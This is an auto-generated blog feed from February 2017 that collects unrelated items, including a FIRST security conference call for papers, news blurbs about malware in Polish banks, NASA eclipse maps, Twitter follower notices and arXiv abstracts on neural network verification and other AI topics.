Source: Gmail -> IFTTT-> Blogger

Ravens: Pierre Garcon would fit type of receiver the team has targeted in free agency in the past - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Call for Papers: FIRST Amsterdam Technical Colloquium (TC) April 2017

We would like to announce a "Save the Date" and "Call for Speakers" for the annual FIRST Amsterdam Technical Colloquium (TC). The main event, hosted by Cisco Systems in Amsterdam, Netherlands will be a plenary style conference held on the 25th and 26th of April 2017. We are also offering an optional, free, training on Monday April 24th. The event website: http://ift.tt/2kHJp6E Event registration is now open. This will be free event with no registration charges (although registration is required). This event will be open to all (not just FIRST members) and fills up quickly. Note, the Monday training has limited seating, so please register early to avoid being turned away. Please register here: http://ift.tt/2km91oH A list of recommended hotels and travel information is available here: http://ift.tt/2kCcSMB http://ift.tt/2km5BC1 Call for Speakers: FIRST is looking for speakers that would like to present at the TC. We are most interested in new presentations and presenters, however important updates on prior work are also welcome. We strongly encourage any individual who has not spoken at a conference before to submit a proposal. The idea behind the TC is to encourage security teams and researchers talent to share their technical work in a friendly environment. While we give special consideration to local talent, submissions are welcome from anyone, anywhere. Any novel ideas, techniques, case studies, or research related to incident and threat response are welcome. Some suggested topics are as follows: - Threat actor groups & techniques - Creative incident response techniques - Indicators of compromise and how detect/mitigate - Data analytics for security - Criminal underground - Denial-of-service attacks and countermeasures - Digital forensics - Human-computer interaction, security, and privacy - Intrusion and anomaly detection and prevention - Malicious code analysis, anti-virus evasion, etc. - Security architecture - Open Source tools - Attack and response to an organization For your submission to be considered, you must provide ALL of the following information: - Title - Presenter's Name(s), Affiliation, and short biography - Brief Summary (Abstract) and completion status/plan - Estimated Time (45 mins + 10 for questions is typical) To: amsterdam-tc@first.org Important Note: FIRST does not allow presentations with the aim of gaining the audience's interest in any commercial application, solution or product. In other words, NO MARKETING PRESENTATIONS. Please only submit a talk if you are actually able to attend the TC in Amsterdam. Our goal is to have the program on the event website by the end of February 2017, to that end please have all submission completed by February 17th. Feel free to reply with any questions. Thank you, Jeff Bollinger & Matthew Valites Cisco CSIRT

Source: Gmail -> IFTTT-> Blogger

[FD] interpreter bugs

Greetings FD, I've recently published fuzzing results for various interpreters [1]. FD members might find them interesting. /ad [1] http://ift.tt/2kTq8fN

Source: Gmail -> IFTTT-> Blogger

2017 Eclipse State Maps

The path of totality passes through 14 states during the total solar eclipse on August 21, 2017. A map of each of these states, created for NASA's official eclipse 2017 website, is presented here. Except for Montana, each map is 8 inches wide (or high) at 300 DPI. The umbra is shown at 3-minute intervals, with times in the local time zone at the umbra center. The duration of totality is outlined in 30-second increments. Interstate highways are blue, other major roads are red, and secondary roads are gray. Some sources list only 12 states for this eclipse, but in fact the path of totality also grazes the southwestern borders of both Montana and Iowa. The Montana part of the path is in a roadless area at the southern end of the Beaverhead Mountains, a range that defines sections of both the Montana-Idaho border and the Continental Divide. The Iowa part of the path is west of Interstate 29 near Hamburg, south of 310 Street, and bounded on the west by the Missouri River. It includes the Lower Hamburg Bend Wildlife Management Area.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2jWL03O
via IFTTT

Monday, February 6, 2017

I have a new follower on Twitter


Peter Mahoney
Recovering CMO of @NuanceInc and GM of @DragonTweets. Posting my musings on all the critical topics: #marketing, #math, #AI, and #bigdata. Oh, and #robots too
Newton, MA
https://t.co/fFj31hR4jx
Following: 295 - Followers: 510

February 06, 2017 at 11:59PM via Twitter http://twitter.com/nerdCMO

Polish Banks Hacked using Malware Planted on their own Government Site

In what considered to be the largest system hack in the country's history and a massive attack on the financial sector, several banks in Poland have been infected with malware. What's surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) -- which, ironically, is meant to keep an eye out for the safety and security of


from The Hacker News http://ift.tt/2ldyeTM
via IFTTT

US Judge Ordered Google to Hand Over Emails Stored On Foreign Servers to FBI

In this world of global mass surveillance by not the only US, but also intelligence agencies across the world, every other country wants tech companies including Google, Apple, and Microsoft to set-up and maintain their servers in their country to keep their citizen data within boundaries. Last year, Microsoft won a case which ruled that the US government cannot force tech companies to hand


from The Hacker News http://ift.tt/2jWny6T
via IFTTT

Anonymous

Anonymous. right. left. AS SEEN ON. Anonymous. by: rippedcord35c. $29.99 USD Save 33%. $19.99 USD. Title. Pick A Size, X-Small, Small, Medium ...

from Google Alert - anonymous http://ift.tt/2kg8iCG
via IFTTT

I have a new follower on Twitter


Nadya Khoja
Director of Marketing at @Venngage and Creator of https://t.co/tSopzLvTsg. Contributor at @HuffingtonPost @Entrepreneur @TheNextWeb @Businessdotcom
Toronto, Ontario
https://t.co/tnQlCazw8c
Following: 10574 - Followers: 13628

February 06, 2017 at 09:14PM via Twitter http://twitter.com/NadyaKhoja

Reluplex: An Efficient SMT Solver for Verifying Deep Neural Networks. (arXiv:1702.01135v1 [cs.AI])

Deep neural networks have emerged as a widely used and effective means for tackling complex, real-world problems. However, a major obstacle in applying them to safety-critical systems is the great difficulty in providing formal guarantees about their behavior. We present a novel, scalable, and efficient technique for verifying properties of deep neural networks (or providing counter-examples). The technique is based on the simplex method, extended to handle the non-convex Rectified Linear Unit (ReLU) activation function, which is a crucial ingredient in many modern neural networks. The verification procedure tackles neural networks as a whole, without making any simplifying assumptions. We evaluated our technique on a prototype deep neural network implementation of the next-generation Airborne Collision Avoidance System for unmanned aircraft (ACAS Xu). Results show that our technique can successfully prove properties of networks that are an order of magnitude larger than the largest networks verified using existing methods.



from cs.AI updates on arXiv.org http://ift.tt/2kl4Vgd
via IFTTT

Traffic Lights with Auction-Based Controllers: Algorithms and Real-World Data. (arXiv:1702.01205v1 [cs.AI])

Real-time optimization of traffic flow addresses important practical problems: reducing a driver's wasted time, improving city-wide efficiency, reducing gas emissions and improving air quality. Much of the current research in traffic-light optimization relies on extending the capabilities of traffic lights to either communicate with each other or communicate with vehicles. However, before such capabilities become ubiquitous, opportunities exist to improve traffic lights by being more responsive to current traffic situations within the current, already deployed, infrastructure. In this paper, we introduce a traffic light controller that employs bidding within micro-auctions to efficiently incorporate traffic sensor information; no other outside sources of information are assumed. We train and test traffic light controllers on large-scale data collected from opted-in Android cell-phone users over a period of several months in Mountain View, California and the River North neighborhood of Chicago, Illinois. The learned auction-based controllers surpass (in both the relevant metrics of road-capacity and mean travel time) the currently deployed lights, optimized static-program lights, and longer-term planning approaches, in both cities, measured using real user driving data.



from cs.AI updates on arXiv.org http://ift.tt/2kMtYth
via IFTTT

A Theoretical Analysis of First Heuristics of Crowdsourced Entity Resolution. (arXiv:1702.01208v1 [cs.DB])

Entity resolution (ER) is the task of identifying all records in a database that refer to the same underlying entity, and are therefore duplicates of each other. Due to inherent ambiguity of data representation and poor data quality, ER is a challenging task for any automated process. As a remedy, human-powered ER via crowdsourcing has become popular in recent years. Using crowd to answer queries is costly and time consuming. Furthermore, crowd-answers can often be faulty. Therefore, crowd-based ER methods aim to minimize human participation without sacrificing the quality and use a computer generated similarity matrix actively. While, some of these methods perform well in practice, no theoretical analysis exists for them, and further their worst case performances do not reflect the experimental findings. This creates a disparity in the understanding of the popular heuristics for this problem. In this paper, we make the first attempt to close this gap. We provide a thorough analysis of the prominent heuristic algorithms for crowd-based ER. We justify experimental observations with our analysis and information theoretic lower bounds.



from cs.AI updates on arXiv.org http://ift.tt/2lhLwdZ
via IFTTT

Cluster-based Kriging Approximation Algorithms for Complexity Reduction. (arXiv:1702.01313v1 [cs.LG])

Kriging or Gaussian Process Regression is applied in many fields as a non-linear regression model as well as a surrogate model in the field of evolutionary computation. However, the computational and space complexity of Kriging, that is cubic and quadratic in the number of data points respectively, becomes a major bottleneck with more and more data available nowadays. In this paper, we propose a general methodology for the complexity reduction, called cluster Kriging, where the whole data set is partitioned into smaller clusters and multiple Kriging models are built on top of them. In addition, four Kriging approximation algorithms are proposed as candidate algorithms within the new framework. Each of these algorithms can be applied to much larger data sets while maintaining the advantages and power of Kriging. The proposed algorithms are explained in detail and compared empirically against a broad set of existing state-of-the-art Kriging approximation methods on a well-defined testing framework. According to the empirical study, the proposed algorithms consistently outperform the existing algorithms. Moreover, some practical suggestions are provided for using the proposed algorithms.



from cs.AI updates on arXiv.org http://ift.tt/2lhWEYh
via IFTTT

Manyopt: An Extensible Tool for Mixed, Non-Linear Optimization Through SMT Solving. (arXiv:1702.01332v1 [cs.AI])

Optimization of Mixed-Integer Non-Linear Programming (MINLP) supports important decisions in applications such as Chemical Process Engineering. But current solvers have limited ability for deductive reasoning or the use of domain-specific theories, and the management of integrality constraints does not yet exploit automated reasoning tools such as SMT solvers. This seems to limit both scalability and reach of such tools in practice. We therefore present a tool, ManyOpt, for MINLP optimization that enables experimentation with reduction techniques which transform a MINLP problem to feasibility checking realized by an SMT solver. ManyOpt is similar to the SAT solver ManySAT in that it runs a specified number of such reduction techniques in parallel to get the strongest result on a given MINLP problem. The tool is implemented in layers, which we may see as features and where reduction techniques are feature vectors. Some of these features are inspired by known MINLP techniques whereas others are novel and specific to SMT. Our experimental results on standard benchmarks demonstrate the benefits of this approach. The tool supports a variety of SMT solvers and is easily extensible with new features, courtesy of its layered structure. For example, logical formulas for deductive reasoning are easily added to constrain further the optimization of a MINLP problem of interest.



from cs.AI updates on arXiv.org http://ift.tt/2jWdQ9m
via IFTTT

Survey of modern Fault Diagnosis methods in networks. (arXiv:1702.01510v1 [cs.AI])

With the advent of modern computer networks, fault diagnosis has been a focus of research activity. This paper reviews the history of fault diagnosis in networks and discusses the main methods in information gathering section, information analyzing section and diagnosing and revolving section of fault diagnosis in networks. Emphasis will be placed upon knowledge-based methods with discussing the advantages and shortcomings of the different methods. The survey is concluded with a description of some open problems.



from cs.AI updates on arXiv.org http://ift.tt/2kfG4Ii
via IFTTT

Exploring the bidimensional space: A dynamic logic point of view. (arXiv:1702.01601v1 [cs.AI])

We present a family of logics for reasoning about agents' positions and motion in the plane which have several potential applications in the area of multi-agent systems (MAS), such as multi-agent planning and robotics. The most general logic includes (i) atomic formulas for representing the truth of a given fact or the presence of a given agent at a certain position of the plane, (ii) atomic programs corresponding to the four basic orientations in the plane (up, down, left, right) as well as the four program constructs of propositional dynamic logic (sequential composition, nondeterministic composition, iteration and test). As this logic is not computably enumerable, we study some interesting decidable and axiomatizable fragments of it. We also present a decidable extension of the iteration-free fragment of the logic by special programs representing motion of agents in the plane.



from cs.AI updates on arXiv.org http://ift.tt/2kBkBdM
via IFTTT

View Independent Vehicle Make, Model and Color Recognition Using Convolutional Neural Network. (arXiv:1702.01721v1 [cs.CV])

This paper describes the details of Sighthound's fully automated vehicle make, model and color recognition system. The backbone of our system is a deep convolutional neural network that is not only computationally inexpensive, but also provides state-of-the-art results on several competitive benchmarks. Additionally, our deep network is trained on a large dataset of several million images which are labeled through a semi-automated process. Finally we test our system on several public datasets as well as our own internal test dataset. Our results show that we outperform other methods on all benchmarks by significant margins. Our model is available to developers through the Sighthound Cloud API at http://ift.tt/1MlcpaD



from cs.AI updates on arXiv.org http://ift.tt/2jWhOin
via IFTTT

A New Oscillating-Error Technique for Classifiers. (arXiv:1505.05312v6 [cs.AI] UPDATED)

This paper describes a new method for reducing the error in a classifier. It uses an error correction update that includes the very simple rule of either adding or subtracting the error adjustment, based on whether the variable value is currently larger or smaller than the desired value. While a traditional neuron would sum the inputs together and then apply a function to the total, this new method can change the function decision for each input value. This gives added flexibility to the convergence procedure, where through a series of transpositions, variables that are far away can continue towards the desired value, whereas variables that are originally much closer can oscillate from one side to the other. Tests show that the method can successfully classify some benchmark datasets. It can also work in a batch mode, with reduced training times and can be used as part of a neural network architecture. Some comparisons with an earlier wave shape paper are also made.



from cs.AI updates on arXiv.org http://ift.tt/1Bd2M5e
via IFTTT

Value Iteration Networks. (arXiv:1602.02867v3 [cs.AI] UPDATED)

We introduce the value iteration network (VIN): a fully differentiable neural network with a `planning module' embedded within. VINs can learn to plan, and are suitable for predicting outcomes that involve planning-based reasoning, such as policies for reinforcement learning. Key to our approach is a novel differentiable approximation of the value-iteration algorithm, which can be represented as a convolutional neural network, and trained end-to-end using standard backpropagation. We evaluate VIN based policies on discrete and continuous path-planning domains, and on a natural-language based search task. We show that by learning an explicit planning computation, VIN policies generalize better to new, unseen domains.



from cs.AI updates on arXiv.org http://ift.tt/1XhcmQD
via IFTTT

Network of Bandits insure Privacy of end-users. (arXiv:1602.03779v12 [cs.AI] UPDATED)

In order to distribute the best arm identification task as close as possible to the user's devices, on the edge of the Radio Access Network, we propose a new problem setting, where distributed players collaborate to find the best arm. This architecture guarantees privacy to end-users since no events are stored. The only thing that can be observed by an adversary through the core network is aggregated information across users. We provide a first algorithm, Distributed Median Elimination, which is near optimal both in terms of number of transmitted bits in terms of number of pulls per player. This first algorithm requires the distribution of players to be known. Extended Distributed Median Elimination overcomes this limitation, by playing in parallel different instances of Distributed Median Elimination and selecting the best one. Experiments illustrate and complete the analysis. According to the analysis, in comparison to Median Elimination performed on each player, the proposed algorithm shows significant practical improvements.



from cs.AI updates on arXiv.org http://ift.tt/1XmBDce
via IFTTT

An Information-Theoretic Framework for Fast and Robust Unsupervised Learning via Neural Population Infomax. (arXiv:1611.01886v3 [cs.LG] UPDATED)

A framework is presented for unsupervised learning of representations based on infomax principle for large-scale neural populations. We use an asymptotic approximation to the Shannon's mutual information for a large neural population to demonstrate that a good initial approximation to the global information-theoretic optimum can be obtained by a hierarchical infomax method. Starting from the initial solution, an efficient algorithm based on gradient descent of the final objective function is proposed to learn representations from the input datasets, and the method works for complete, overcomplete, and undercomplete bases. As confirmed by numerical experiments, our method is robust and highly efficient for extracting salient features from input datasets. Compared with the main existing methods, our algorithm has a distinct advantage in both the training speed and the robustness of unsupervised representation learning. Moreover, the method is readily extended to train deep structure networks by unsupervised or supervised learning.



from cs.AI updates on arXiv.org http://ift.tt/2fx5xxG
via IFTTT